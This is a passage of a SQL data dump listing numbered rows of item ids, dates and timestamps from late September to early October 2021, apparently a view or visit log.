07:57:21'),(34739,4387,1,'2021-09-25','2021-09-25 08:11:18'),(34740,2609,1,'2021-09-25','2021-09-25 09:02:59'),(34741,2159,1,'2021-09-25','2021-09-25 09:03:46'),(34742,4363,1,'2021-09-25','2021-09-25 09:19:58'),(34743,1726,1,'2021-09-25','2021-09-25 09:47:33'),(34744,4332,1,'2021-09-25','2021-09-25 09:50:56'),(34745,1739,1,'2021-09-25','2021-09-25 09:53:47'),(34746,1588,1,'2021-09-25','2021-09-25 10:02:38'),(34747,3789,1,'2021-09-25','2021-09-25 10:28:31'),(34748,1602,1,'2021-09-25','2021-09-25 10:33:07'),(34749,1602,1,'2021-09-25','2021-09-25 10:43:51'),(34750,1602,1,'2021-09-25','2021-09-25 10:56:32'),(34751,4377,1,'2021-09-25','2021-09-25 11:45:06'),(34752,4377,1,'2021-09-25','2021-09-25 11:53:24'),(34753,1612,1,'2021-09-25','2021-09-25 11:53:44'),(34754,1612,1,'2021-09-25','2021-09-25 11:53:45'),(34755,1596,1,'2021-09-25','2021-09-25 11:54:37'),(34756,1600,1,'2021-09-25','2021-09-25 12:48:55'),(34757,80,1,'2021-09-25','2021-09-25 12:49:15'),(34758,4332,1,'2021-09-25','2021-09-25 13:16:04'),(34759,91,1,'2021-09-25','2021-09-25 13:17:59'),(34760,2457,1,'2021-09-25','2021-09-25 14:01:25'),(34761,2457,1,'2021-09-25','2021-09-25 14:01:45'),(34762,1718,1,'2021-09-25','2021-09-25 14:15:34'),(34763,2769,1,'2021-09-25','2021-09-25 14:55:49'),(34764,4382,1,'2021-09-25','2021-09-25 15:29:59'),(34765,3083,1,'2021-09-25','2021-09-25 15:50:20'),(34766,1586,1,'2021-09-25','2021-09-25 16:28:49'),(34767,1588,1,'2021-09-25','2021-09-25 16:34:46'),(34768,1739,1,'2021-09-25','2021-09-25 17:17:48'),(34769,1718,1,'2021-09-25','2021-09-25 17:25:24'),(34770,4396,1,'2021-09-25','2021-09-25 17:32:03'),(34771,1600,1,'2021-09-25','2021-09-25 18:02:42'),(34772,4332,1,'2021-09-25','2021-09-25 18:03:08'),(34773,2309,1,'2021-09-25','2021-09-25 18:07:20'),(34774,479,1,'2021-09-25','2021-09-25 18:27:04'),(34775,1596,1,'2021-09-25','2021-09-25 18:35:41'),(34776,1739,1,'2021-09-25','2021-09-25 18:47:42'),(34777,2159,1,'2021-09-25','2021-09-25 18:53:43'),(34778,3710,1,'2021-09-25','2021-09-25 19:26:20'),(34779,3045,1,'2021-09-25','2021-09-25 19:32:41'),(34780,486,1,'2021-09-25','2021-09-25 19:38:41'),(34781,2150,1,'2021-09-25','2021-09-25 20:23:40'),(34782,2813,1,'2021-09-25','2021-09-25 20:45:48'),(34783,1586,1,'2021-09-25','2021-09-25 20:46:13'),(34784,1596,1,'2021-09-25','2021-09-25 21:26:04'),(34785,1602,1,'2021-09-25','2021-09-25 21:31:04'),(34786,72,1,'2021-09-25','2021-09-25 21:35:38'),(34787,1726,1,'2021-09-26','2021-09-26 00:01:26'),(34788,2617,1,'2021-09-26','2021-09-26 00:01:28'),(34789,1600,1,'2021-09-26','2021-09-26 00:02:39'),(34790,1586,1,'2021-09-26','2021-09-26 00:16:13'),(34791,2457,1,'2021-09-26','2021-09-26 00:30:55'),(34792,2411,1,'2021-09-26','2021-09-26 01:00:51'),(34793,2769,1,'2021-09-26','2021-09-26 01:17:27'),(34794,3664,1,'2021-09-26','2021-09-26 01:31:28'),(34795,1594,1,'2021-09-26','2021-09-26 01:32:43'),(34796,1726,1,'2021-09-26','2021-09-26 02:16:27'),(34797,1582,1,'2021-09-26','2021-09-26 04:03:51'),(34798,72,1,'2021-09-26','2021-09-26 05:33:25'),(34799,1586,1,'2021-09-26','2021-09-26 05:52:46'),(34800,2704,1,'2021-09-26','2021-09-26 06:09:17'),(34801,1602,1,'2021-09-26','2021-09-26 06:26:11'),(34802,4332,1,'2021-09-26','2021-09-26 06:50:15'),(34803,2411,1,'2021-09-26','2021-09-26 07:03:08'),(34804,2775,1,'2021-09-26','2021-09-26 07:28:55'),(34805,1588,1,'2021-09-26','2021-09-26 08:27:46'),(34806,4382,1,'2021-09-26','2021-09-26 08:44:51'),(34807,1596,1,'2021-09-26','2021-09-26 09:05:00'),(34808,2801,1,'2021-09-26','2021-09-26 10:55:06'),(34809,3664,1,'2021-09-26','2021-09-26 11:02:46'),(34810,3534,1,'2021-09-26','2021-09-26 11:20:18'),(34811,3531,1,'2021-09-26','2021-09-26 11:21:22'),(34812,3180,1,'2021-09-26','2021-09-26 11:39:17'),(34813,1598,1,'2021-09-26','2021-09-26 11:39:35'),(34814,2150,1,'2021-09-26','2021-09-26 11:48:09'),(34815,91,1,'2021-09-26','2021-09-26 11:58:16'),(34816,1726,1,'2021-09-26','2021-09-26 12:32:34'),(34817,1602,1,'2021-09-26','2021-09-26 12:59:25'),(34818,1582,1,'2021-09-26','2021-09-26 13:05:18'),(34819,3034,1,'2021-09-26','2021-09-26 13:21:56'),(34820,72,1,'2021-09-26','2021-09-26 13:51:36'),(34821,1766,1,'2021-09-26','2021-09-26 13:54:53'),(34822,3781,1,'2021-09-26','2021-09-26 14:22:39'),(34823,2617,1,'2021-09-26','2021-09-26 14:39:56'),(34824,3180,1,'2021-09-26','2021-09-26 16:00:54'),(34825,570,1,'2021-09-26','2021-09-26 16:54:35'),(34826,80,1,'2021-09-26','2021-09-26 17:38:47'),(34827,1598,1,'2021-09-26','2021-09-26 17:42:45'),(34828,1586,1,'2021-09-26','2021-09-26 17:49:28'),(34829,1713,1,'2021-09-26','2021-09-26 17:56:16'),(34830,4335,1,'2021-09-26','2021-09-26 18:08:46'),(34831,1606,1,'2021-09-26','2021-09-26 18:16:03'),(34832,570,1,'2021-09-26','2021-09-26 18:28:02'),(34833,3777,1,'2021-09-26','2021-09-26 18:41:14'),(34834,3777,1,'2021-09-26','2021-09-26 18:53:46'),(34835,3083,1,'2021-09-26','2021-09-26 19:23:45'),(34836,2991,1,'2021-09-26','2021-09-26 19:27:21'),(34837,1598,1,'2021-09-26','2021-09-26 19:38:44'),(34838,3083,1,'2021-09-26','2021-09-26 19:53:43'),(34839,470,1,'2021-09-26','2021-09-26 20:08:50'),(34840,2457,1,'2021-09-26','2021-09-26 20:23:45'),(34841,2309,1,'2021-09-26','2021-09-26 20:38:45'),(34842,3006,1,'2021-09-26','2021-09-26 20:39:01'),(34843,1602,1,'2021-09-26','2021-09-26 20:53:43'),(34844,1588,1,'2021-09-26','2021-09-26 21:08:25'),(34845,72,1,'2021-09-26','2021-09-26 21:17:53'),(34846,484,1,'2021-09-26','2021-09-26 22:48:05'),(34847,2769,1,'2021-09-26','2021-09-26 23:34:53'),(34848,4332,1,'2021-09-26','2021-09-26 23:52:27'),(34849,1766,1,'2021-09-27','2021-09-27 00:15:53'),(34850,2309,1,'2021-09-27','2021-09-27 00:46:32'),(34851,1592,1,'2021-09-27','2021-09-27 00:52:58'),(34852,1602,1,'2021-09-27','2021-09-27 01:19:01'),(34853,3090,1,'2021-09-27','2021-09-27 01:40:40'),(34854,4391,1,'2021-09-27','2021-09-27 02:33:50'),(34855,3034,1,'2021-09-27','2021-09-27 02:42:21'),(34856,1596,1,'2021-09-27','2021-09-27 03:01:28'),(34857,2309,1,'2021-09-27','2021-09-27 04:20:29'),(34858,1718,1,'2021-09-27','2021-09-27 04:52:15'),(34859,4332,1,'2021-09-27','2021-09-27 05:21:09'),(34860,2748,1,'2021-09-27','2021-09-27 05:36:14'),(34861,1586,1,'2021-09-27','2021-09-27 05:51:27'),(34862,72,1,'2021-09-27','2021-09-27 05:52:24'),(34863,2457,1,'2021-09-27','2021-09-27 06:06:06'),(34864,2964,1,'2021-09-27','2021-09-27 06:51:05'),(34865,1588,1,'2021-09-27','2021-09-27 06:57:07'),(34866,2911,1,'2021-09-27','2021-09-27 07:16:58'),(34867,2309,1,'2021-09-27','2021-09-27 07:48:11'),(34868,2309,1,'2021-09-27','2021-09-27 08:04:20'),(34869,1766,1,'2021-09-27','2021-09-27 08:43:33'),(34870,80,1,'2021-09-27','2021-09-27 08:59:37'),(34871,4377,1,'2021-09-27','2021-09-27 09:06:04'),(34872,2769,1,'2021-09-27','2021-09-27 09:17:25'),(34873,3482,1,'2021-09-27','2021-09-27 09:27:35'),(34874,1598,1,'2021-09-27','2021-09-27 09:34:06'),(34875,570,1,'2021-09-27','2021-09-27 09:47:11'),(34876,570,1,'2021-09-27','2021-09-27 09:47:21'),(34877,570,1,'2021-09-27','2021-09-27 09:47:47'),(34878,570,1,'2021-09-27','2021-09-27 09:48:09'),(34879,570,1,'2021-09-27','2021-09-27 09:50:14'),(34880,570,1,'2021-09-27','2021-09-27 09:50:33'),(34881,2991,1,'2021-09-27','2021-09-27 10:17:44'),(34882,3069,1,'2021-09-27','2021-09-27 10:27:52'),(34883,1592,1,'2021-09-27','2021-09-27 10:36:37'),(34884,3004,1,'2021-09-27','2021-09-27 10:55:43'),(34885,1608,1,'2021-09-27','2021-09-27 11:04:31'),(34886,76,1,'2021-09-27','2021-09-27 11:55:06'),(34887,2904,1,'2021-09-27','2021-09-27 11:56:53'),(34888,3261,1,'2021-09-27','2021-09-27 13:02:19'),(34889,1596,1,'2021-09-27','2021-09-27 13:18:53'),(34890,72,1,'2021-09-27','2021-09-27 13:34:17'),(34891,1610,1,'2021-09-27','2021-09-27 13:47:31'),(34892,3030,1,'2021-09-27','2021-09-27 14:09:05'),(34893,3764,1,'2021-09-27','2021-09-27 14:14:23'),(34894,2309,1,'2021-09-27','2021-09-27 15:34:28'),(34895,1588,1,'2021-09-27','2021-09-27 15:53:08'),(34896,2457,1,'2021-09-27','2021-09-27 16:21:44'),(34897,3269,1,'2021-09-27','2021-09-27 17:01:15'),(34898,72,1,'2021-09-27','2021-09-27 17:01:16'),(34899,2148,1,'2021-09-27','2021-09-27 17:07:12'),(34900,2148,1,'2021-09-27','2021-09-27 17:07:35'),(34901,2148,1,'2021-09-27','2021-09-27 17:08:54'),(34902,1718,1,'2021-09-27','2021-09-27 17:41:29'),(34903,1586,1,'2021-09-27','2021-09-27 17:45:29'),(34904,1718,1,'2021-09-27','2021-09-27 17:57:32'),(34905,570,1,'2021-09-27','2021-09-27 18:23:16'),(34906,570,1,'2021-09-27','2021-09-27 18:36:08'),(34907,4335,1,'2021-09-27','2021-09-27 18:52:19'),(34908,4335,1,'2021-09-27','2021-09-27 18:55:26'),(34909,3706,1,'2021-09-27','2021-09-27 19:42:18'),(34910,1592,1,'2021-09-27','2021-09-27 19:45:41'),(34911,1610,1,'2021-09-27','2021-09-27 20:15:51'),(34912,1594,1,'2021-09-27','2021-09-27 20:46:27'),(34913,2769,1,'2021-09-27','2021-09-27 21:08:56'),(34914,4341,1,'2021-09-27','2021-09-27 21:41:21'),(34915,2609,1,'2021-09-27','2021-09-27 22:27:49'),(34916,2148,1,'2021-09-27','2021-09-27 22:28:31'),(34917,2148,1,'2021-09-27','2021-09-27 22:28:38'),(34918,2148,1,'2021-09-27','2021-09-27 22:28:58'),(34919,2148,1,'2021-09-27','2021-09-27 22:29:19'),(34920,2148,1,'2021-09-27','2021-09-27 22:29:40'),(34921,1768,1,'2021-09-27','2021-09-27 22:35:09'),(34922,3261,1,'2021-09-27','2021-09-27 22:49:12'),(34923,2309,1,'2021-09-27','2021-09-27 23:49:52'),(34924,2309,1,'2021-09-27','2021-09-27 23:50:00'),(34925,3006,1,'2021-09-28','2021-09-28 00:40:59'),(34926,2457,1,'2021-09-28','2021-09-28 01:01:39'),(34927,1582,1,'2021-09-28','2021-09-28 01:39:20'),(34928,4391,1,'2021-09-28','2021-09-28 02:24:43'),(34929,1586,1,'2021-09-28','2021-09-28 03:38:46'),(34930,72,1,'2021-09-28','2021-09-28 04:29:21'),(34931,2309,1,'2021-09-28','2021-09-28 04:52:30'),(34932,4338,1,'2021-09-28','2021-09-28 05:00:04'),(34933,2420,1,'2021-09-28','2021-09-28 05:07:49'),(34934,1586,1,'2021-09-28','2021-09-28 05:15:23'),(34935,2309,1,'2021-09-28','2021-09-28 05:30:06'),(34936,1592,1,'2021-09-28','2021-09-28 05:48:51'),(34937,1768,1,'2021-09-28','2021-09-28 06:12:03'),(34938,4341,1,'2021-09-28','2021-09-28 07:23:21'),(34939,3006,1,'2021-09-28','2021-09-28 09:55:30'),(34940,1588,1,'2021-09-28','2021-09-28 11:04:24'),(34941,2410,1,'2021-09-28','2021-09-28 12:10:48'),(34942,2904,1,'2021-09-28','2021-09-28 12:32:26'),(34943,2769,1,'2021-09-28','2021-09-28 12:59:40'),(34944,1596,1,'2021-09-28','2021-09-28 13:09:36'),(34945,3257,1,'2021-09-28','2021-09-28 13:16:55'),(34946,3265,1,'2021-09-28','2021-09-28 13:17:03'),(34947,1722,1,'2021-09-28','2021-09-28 13:18:05'),(34948,1722,1,'2021-09-28','2021-09-28 13:18:26'),(34949,1722,1,'2021-09-28','2021-09-28 13:22:54'),(34950,1718,1,'2021-09-28','2021-09-28 13:59:58'),(34951,2503,1,'2021-09-28','2021-09-28 14:09:36'),(34952,4335,1,'2021-09-28','2021-09-28 15:55:28'),(34953,4335,1,'2021-09-28','2021-09-28 15:57:08'),(34954,4400,1,'2021-09-28','2021-09-28 16:22:32'),(34955,72,1,'2021-09-28','2021-09-28 16:23:57'),(34956,3788,1,'2021-09-28','2021-09-28 16:24:26'),(34957,4335,1,'2021-09-28','2021-09-28 16:25:34'),(34958,4400,1,'2021-09-28','2021-09-28 16:26:07'),(34959,4341,1,'2021-09-28','2021-09-28 16:26:19'),(34960,1612,1,'2021-09-28','2021-09-28 16:29:04'),(34961,2503,1,'2021-09-28','2021-09-28 16:29:56'),(34962,91,1,'2021-09-28','2021-09-28 16:33:28'),(34963,4400,1,'2021-09-28','2021-09-28 17:08:08'),(34964,3482,1,'2021-09-28','2021-09-28 17:59:44'),(34965,2617,1,'2021-09-28','2021-09-28 18:55:01'),(34966,80,1,'2021-09-28','2021-09-28 19:16:59'),(34967,80,1,'2021-09-28','2021-09-28 19:18:25'),(34968,1606,1,'2021-09-28','2021-09-28 19:26:39'),(34969,76,1,'2021-09-28','2021-09-28 19:27:40'),(34970,1586,1,'2021-09-28','2021-09-28 19:39:25'),(34971,91,1,'2021-09-28','2021-09-28 19:40:32'),(34972,1582,1,'2021-09-28','2021-09-28 20:01:48'),(34973,1594,1,'2021-09-28','2021-09-28 21:57:14'),(34974,1544,1,'2021-09-28','2021-09-28 23:47:42'),(34975,91,1,'2021-09-28','2021-09-28 23:49:26'),(34976,4420,1,'2021-09-28','2021-09-28 23:51:13'),(34977,4420,1,'2021-09-28','2021-09-28 23:51:14'),(34978,1718,1,'2021-09-29','2021-09-29 01:41:43'),(34979,1602,1,'2021-09-29','2021-09-29 02:45:23'),(34980,3430,1,'2021-09-29','2021-09-29 03:00:06'),(34981,1596,1,'2021-09-29','2021-09-29 05:40:29'),(34982,1604,1,'2021-09-29','2021-09-29 05:50:55'),(34983,4338,1,'2021-09-29','2021-09-29 05:59:34'),(34984,1586,1,'2021-09-29','2021-09-29 06:07:09'),(34985,2148,1,'2021-09-29','2021-09-29 06:29:00'),(34986,2148,1,'2021-09-29','2021-09-29 06:29:07'),(34987,1582,1,'2021-09-29','2021-09-29 07:01:14'),(34988,1586,1,'2021-09-29','2021-09-29 07:14:32'),(34989,1602,1,'2021-09-29','2021-09-29 07:27:11'),(34990,1726,1,'2021-09-29','2021-09-29 07:44:27'),(34991,1726,1,'2021-09-29','2021-09-29 07:44:40'),(34992,1726,1,'2021-09-29','2021-09-29 07:45:02'),(34993,1726,1,'2021-09-29','2021-09-29 07:45:10'),(34994,467,1,'2021-09-29','2021-09-29 07:49:57'),(34995,4363,1,'2021-09-29','2021-09-29 08:14:10'),(34996,1592,1,'2021-09-29','2021-09-29 08:38:06'),(34997,3030,1,'2021-09-29','2021-09-29 09:35:46'),(34998,1600,1,'2021-09-29','2021-09-29 09:48:48'),(34999,4396,1,'2021-09-29','2021-09-29 10:39:42'),(35000,3714,1,'2021-09-29','2021-09-29 10:51:27'),(35001,1602,1,'2021-09-29','2021-09-29 10:52:33'),(35002,68,1,'2021-09-29','2021-09-29 10:53:13'),(35003,1602,1,'2021-09-29','2021-09-29 10:54:01'),(35004,91,1,'2021-09-29','2021-09-29 10:54:20'),(35005,1602,1,'2021-09-29','2021-09-29 10:55:48'),(35006,1602,1,'2021-09-29','2021-09-29 10:56:00'),(35007,68,1,'2021-09-29','2021-09-29 10:57:01'),(35008,1602,1,'2021-09-29','2021-09-29 10:57:11'),(35009,1728,1,'2021-09-29','2021-09-29 10:59:11'),(35010,4400,1,'2021-09-29','2021-09-29 11:27:44'),(35011,3083,1,'2021-09-29','2021-09-29 11:45:53'),(35012,87,1,'2021-09-29','2021-09-29 11:47:01'),(35013,4344,1,'2021-09-29','2021-09-29 12:21:49'),(35014,1602,1,'2021-09-29','2021-09-29 12:22:48'),(35015,4344,1,'2021-09-29','2021-09-29 12:25:49'),(35016,1602,1,'2021-09-29','2021-09-29 12:27:21'),(35017,72,1,'2021-09-29','2021-09-29 12:31:35'),(35018,1602,1,'2021-09-29','2021-09-29 13:28:19'),(35019,2159,1,'2021-09-29','2021-09-29 13:48:58'),(35020,2159,1,'2021-09-29','2021-09-29 13:52:50'),(35021,3764,1,'2021-09-29','2021-09-29 15:01:08'),(35022,1582,1,'2021-09-29','2021-09-29 15:31:24'),(35023,1600,1,'2021-09-29','2021-09-29 15:40:42'),(35024,3781,1,'2021-09-29','2021-09-29 16:18:05'),(35025,1588,1,'2021-09-29','2021-09-29 16:27:23'),(35026,1749,1,'2021-09-29','2021-09-29 17:32:24'),(35027,478,1,'2021-09-29','2021-09-29 17:54:07'),(35028,1586,1,'2021-09-29','2021-09-29 18:40:23'),(35029,1608,1,'2021-09-29','2021-09-29 19:39:51'),(35030,4348,1,'2021-09-29','2021-09-29 20:23:15'),(35031,4348,1,'2021-09-29','2021-09-29 20:24:15'),(35032,2309,1,'2021-09-29','2021-09-29 20:34:20'),(35033,2309,1,'2021-09-29','2021-09-29 20:34:41'),(35034,2309,1,'2021-09-29','2021-09-29 20:34:55'),(35035,1592,1,'2021-09-29','2021-09-29 20:52:34'),(35036,4348,1,'2021-09-29','2021-09-29 20:54:58'),(35037,3789,1,'2021-09-29','2021-09-29 21:14:04'),(35038,1749,1,'2021-09-29','2021-09-29 21:16:21'),(35039,1604,1,'2021-09-29','2021-09-29 21:26:25'),(35040,2769,1,'2021-09-29','2021-09-29 21:26:53'),(35041,3181,1,'2021-09-29','2021-09-29 21:32:47'),(35042,72,1,'2021-09-29','2021-09-29 21:42:15'),(35043,80,1,'2021-09-29','2021-09-29 21:48:03'),(35044,1588,1,'2021-09-29','2021-09-29 22:22:32'),(35045,1598,1,'2021-09-30','2021-09-30 01:15:32'),(35046,2609,1,'2021-09-30','2021-09-30 01:17:12'),(35047,1604,1,'2021-09-30','2021-09-30 01:19:23'),(35048,1778,1,'2021-09-30','2021-09-30 02:32:38'),(35049,3181,1,'2021-09-30','2021-09-30 02:55:31'),(35050,1718,1,'2021-09-30','2021-09-30 03:05:11'),(35051,1776,1,'2021-09-30','2021-09-30 03:13:07'),(35052,2769,1,'2021-09-30','2021-09-30 03:34:31'),(35053,1741,1,'2021-09-30','2021-09-30 04:30:51'),(35054,4301,1,'2021-09-30','2021-09-30 04:48:23'),(35055,1586,1,'2021-09-30','2021-09-30 05:26:28'),(35056,72,1,'2021-09-30','2021-09-30 06:11:42'),(35057,2964,1,'2021-09-30','2021-09-30 06:39:28'),(35058,4400,1,'2021-09-30','2021-09-30 06:49:41'),(35059,4400,1,'2021-09-30','2021-09-30 07:07:24'),(35060,1614,1,'2021-09-30','2021-09-30 07:18:05'),(35061,2309,1,'2021-09-30','2021-09-30 08:19:15'),(35062,1598,1,'2021-09-30','2021-09-30 09:33:18'),(35063,1592,1,'2021-09-30','2021-09-30 09:36:41'),(35064,1544,1,'2021-09-30','2021-09-30 09:45:16'),(35065,2964,1,'2021-09-30','2021-09-30 09:46:02'),(35066,1776,1,'2021-09-30','2021-09-30 09:46:55'),(35067,3585,1,'2021-09-30','2021-09-30 09:48:30'),(35068,74,1,'2021-09-30','2021-09-30 10:03:13'),(35069,1602,1,'2021-09-30','2021-09-30 10:21:34'),(35070,80,1,'2021-09-30','2021-09-30 11:23:05'),(35071,1588,1,'2021-09-30','2021-09-30 12:12:20'),(35072,3764,1,'2021-09-30','2021-09-30 12:32:06'),(35073,468,1,'2021-09-30','2021-09-30 14:00:55'),(35074,1778,1,'2021-09-30','2021-09-30 14:18:26'),(35075,1596,1,'2021-09-30','2021-09-30 14:23:27'),(35076,80,1,'2021-09-30','2021-09-30 14:28:57'),(35077,1596,1,'2021-09-30','2021-09-30 14:30:48'),(35078,72,1,'2021-09-30','2021-09-30 14:42:48'),(35079,2309,1,'2021-09-30','2021-09-30 15:30:47'),(35080,2309,1,'2021-09-30','2021-09-30 15:31:10'),(35081,2309,1,'2021-09-30','2021-09-30 15:31:25'),(35082,2309,1,'2021-09-30','2021-09-30 15:31:44'),(35083,1544,1,'2021-09-30','2021-09-30 15:51:50'),(35084,1606,1,'2021-09-30','2021-09-30 16:41:10'),(35085,1614,1,'2021-09-30','2021-09-30 16:49:55'),(35086,91,1,'2021-09-30','2021-09-30 16:55:33'),(35087,2704,1,'2021-09-30','2021-09-30 16:57:47'),(35088,469,1,'2021-09-30','2021-09-30 17:16:50'),(35089,80,1,'2021-09-30','2021-09-30 17:29:26'),(35090,1594,1,'2021-09-30','2021-09-30 17:44:12'),(35091,1594,1,'2021-09-30','2021-09-30 18:21:54'),(35092,1594,1,'2021-09-30','2021-09-30 18:21:54'),(35093,76,1,'2021-09-30','2021-09-30 18:23:46'),(35094,3781,1,'2021-09-30','2021-09-30 18:24:56'),(35095,2658,1,'2021-09-30','2021-09-30 18:56:42'),(35096,2658,1,'2021-09-30','2021-09-30 18:57:01'),(35097,91,1,'2021-09-30','2021-09-30 18:57:39'),(35098,469,1,'2021-09-30','2021-09-30 18:58:30'),(35099,1776,1,'2021-09-30','2021-09-30 19:00:12'),(35100,4332,1,'2021-09-30','2021-09-30 19:51:38'),(35101,1588,1,'2021-09-30','2021-09-30 20:22:26'),(35102,1602,1,'2021-09-30','2021-09-30 20:33:56'),(35103,80,1,'2021-09-30','2021-09-30 20:56:18'),(35104,68,1,'2021-09-30','2021-09-30 20:56:23'),(35105,108,1,'2021-09-30','2021-09-30 20:56:28'),(35106,3764,1,'2021-09-30','2021-09-30 21:00:44'),(35107,72,1,'2021-09-30','2021-09-30 21:03:58'),(35108,2297,1,'2021-09-30','2021-09-30 21:07:37'),(35109,2769,1,'2021-09-30','2021-09-30 21:09:16'),(35110,80,1,'2021-09-30','2021-09-30 21:19:27'),(35111,3090,1,'2021-09-30','2021-09-30 21:49:35'),(35112,1588,1,'2021-09-30','2021-09-30 22:02:15'),(35113,3781,1,'2021-09-30','2021-09-30 22:07:41'),(35114,3127,1,'2021-09-30','2021-09-30 22:09:50'),(35115,2813,1,'2021-09-30','2021-09-30 22:50:07'),(35116,2159,1,'2021-09-30','2021-09-30 23:39:38'),(35117,3290,1,'2021-09-30','2021-09-30 23:42:56'),(35118,4387,1,'2021-10-01','2021-10-01 00:12:02'),(35119,1602,1,'2021-10-01','2021-10-01 01:21:10'),(35120,3313,1,'2021-10-01','2021-10-01 01:32:39'),(35121,2309,1,'2021-10-01','2021-10-01 01:52:25'),(35122,3764,1,'2021-10-01','2021-10-01 02:19:58'),(35123,1778,1,'2021-10-01','2021-10-01 02:43:20'),(35124,1606,1,'2021-10-01','2021-10-01 03:56:08'),(35125,1778,1,'2021-10-01','2021-10-01 04:30:42'),(35126,3710,1,'2021-10-01','2021-10-01 04:57:17'),(35127,3307,1,'2021-10-01','2021-10-01 05:23:14'),(35128,2989,1,'2021-10-01','2021-10-01 05:32:32'),(35129,3764,1,'2021-10-01','2021-10-01 05:57:23'),(35130,570,1,'2021-10-01','2021-10-01 06:41:39'),(35131,1598,1,'2021-10-01','2021-10-01 07:56:32'),(35132,1600,1,'2021-10-01','2021-10-01 07:57:54'),(35133,1600,1,'2021-10-01','2021-10-01 07:57:55'),(35134,472,1,'2021-10-01','2021-10-01 08:50:58'),(35135,2148,1,'2021-10-01','2021-10-01 09:39:22'),(35136,3307,1,'2021-10-01','2021-10-01 09:40:10'),(35137,2165,1,'2021-10-01','2021-10-01 09:42:23'),(35138,570,1,'2021-10-01','2021-10-01 10:14:35'),(35139,1718,1,'2021-10-01','2021-10-01 10:26:36'),(35140,4332,1,'2021-10-01','2021-10-01 10:52:37'),(35141,1602,1,'2021-10-01','2021-10-01 11:54:54'),(35142,2148,1,'2021-10-01','2021-10-01 13:07:22'),(35143,3313,1,'2021-10-01','2021-10-01 13:10:10'),(35144,1596,1,'2021-10-01','2021-10-01 13:32:32'),(35145,2503,1,'2021-10-01','2021-10-01 13:34:29'),(35146,2503,1,'2021-10-01','2021-10-01 14:19:37'),(35147,2769,1,'2021-10-01','2021-10-01 14:55:06'),(35148,4332,1,'2021-10-01','2021-10-01 16:29:25'),(35149,2309,1,'2021-10-01','2021-10-01 16:32:08'),(35150,4338,1,'2021-10-01','2021-10-01 17:06:21'),(35151,1695,1,'2021-10-01','2021-10-01 17:25:43'),(35152,1600,1,'2021-10-01','2021-10-01 19:05:42'),(35153,1600,1,'2021-10-01','2021-10-01 19:05:49'),(35154,1586,1,'2021-10-01','2021-10-01 19:26:40'),(35155,3290,1,'2021-10-01','2021-10-01 19:34:05'),(35156,2165,1,'2021-10-01','2021-10-01 19:53:08'),(35157,2457,1,'2021-10-01','2021-10-01 20:23:28'),(35158,1602,1,'2021-10-01','2021-10-01 20:44:46'),(35159,2704,1,'2021-10-01','2021-10-01 21:04:06'),(35160,2704,1,'2021-10-01','2021-10-01 21:23:07'),(35161,1588,1,'2021-10-01','2021-10-01 21:38:08'),(35162,1606,1,'2021-10-01','2021-10-01 22:10:31'),(35163,1606,1,'2021-10-01','2021-10-01 22:10:42'),(35164,4332,1,'2021-10-01','2021-10-01 22:33:45'),(35165,2617,1,'2021-10-01','2021-10-01 23:41:10'),(35166,108,1,'2021-10-01','2021-10-01 23:48:12'),(35167,1718,1,'2021-10-01','2021-10-01 23:48:52'),(35168,2989,1,'2021-10-02','2021-10-02 00:45:36'),(35169,1582,1,'2021-10-02','2021-10-02 00:47:57'),(35170,2148,1,'2021-10-02','2021-10-02 03:00:18'),(35171,2148,1,'2021-10-02','2021-10-02 03:01:09'),(35172,1711,1,'2021-10-02','2021-10-02 04:59:01'),(35173,1588,1,'2021-10-02','2021-10-02 05:30:28'),(35174,2457,1,'2021-10-02','2021-10-02 05:45:53'),(35175,2309,1,'2021-10-02','2021-10-02 05:45:55'),(35176,472,1,'2021-10-02','2021-10-02 06:13:07'),(35177,1602,1,'2021-10-02','2021-10-02 06:28:13'),(35178,3781,1,'2021-10-02','2021-10-02 06:54:06'),(35179,3313,1,'2021-10-02','2021-10-02 06:55:42'),(35180,472,1,'2021-10-02','2021-10-02 07:06:06'),(35181,2558,1,'2021-10-02','2021-10-02 07:12:27'),(35182,1586,1,'2021-10-02','2021-10-02 08:08:12'),(35183,1586,1,'2021-10-02','2021-10-02 08:37:40'),(35184,72,1,'2021-10-02','2021-10-02 08:58:10'),(35185,3030,1,'2021-10-02','2021-10-02 09:25:35'),(35186,2159,1,'2021-10-02','2021-10-02 09:38:08'),(35187,2704,1,'2021-10-02','2021-10-02 09:59:46'),(35188,1749,1,'2021-10-02','2021-10-02 10:26:09'),(35189,2609,1,'2021-10-02','2021-10-02 10:59:27'),(35190,1596,1,'2021-10-02','2021-10-02 11:44:58'),(35191,1586,1,'2021-10-02','2021-10-02 12:27:50'),(35192,1600,1,'2021-10-02','2021-10-02 12:55:39'),(35193,1586,1,'2021-10-02','2021-10-02 14:02:29'),(35194,1602,1,'2021-10-02','2021-10-02 14:23:56'),(35195,3004,1,'2021-10-02','2021-10-02 14:34:24'),(35196,469,1,'2021-10-02','2021-10-02 16:00:12'),(35197,473,1,'2021-10-02','2021-10-02 16:17:34'),(35198,72,1,'2021-10-02','2021-10-02 17:31:19'),(35199,1877,1,'2021-10-02','2021-10-02 17:47:52'),(35200,1588,1,'2021-10-02','2021-10-02 17:57:29'),(35201,1614,1,'2021-10-02','2021-10-02 18:42:24'),(35202,1598,1,'2021-10-02','2021-10-02 19:33:34'),(35203,1602,1,'2021-10-02','2021-10-02 21:29:08'),(35204,1718,1,'2021-10-02','2021-10-02 21:50:52'),(35205,472,1,'2021-10-02','2021-10-02 23:39:25'),(35206,1602,1,'2021-10-02','2021-10-02 23:46:17'),(35207,2309,1,'2021-10-03','2021-10-03 00:39:59'),(35208,3781,1,'2021-10-03','2021-10-03 00:52:08'),(35209,3781,1,'2021-10-03','2021-10-03 00:52:10'),(35210,3746,1,'2021-10-03','2021-10-03 01:14:07'),(35211,72,1,'2021-10-03','2021-10-03 02:23:56'),(35212,3004,1,'2021-10-03','2021-10-03 02:34:04'),(35213,1586,1,'2021-10-03','2021-10-03 02:38:15'),(35214,1600,1,'2021-10-03','2021-10-03 02:55:33'),(35215,2457,1,'2021-10-03','2021-10-03 04:08:07'),(35216,1606,1,'2021-10-03','2021-10-03 04:21:50'),(35217,1598,1,'2021-10-03','2021-10-03 04:41:32'),(35218,3282,1,'2021-10-03','2021-10-03 04:48:39'),(35219,2309,1,'2021-10-03','2021-10-03 04:50:13'),(35220,472,1,'2021-10-03','2021-10-03 05:34:03'),(35221,1602,1,'2021-10-03','2021-10-03 05:58:23'),(35222,3004,1,'2021-10-03','2021-10-03 06:17:29'),(35223,469,1,'2021-10-03','2021-10-03 06:47:12'),(35224,72,1,'2021-10-03','2021-10-03 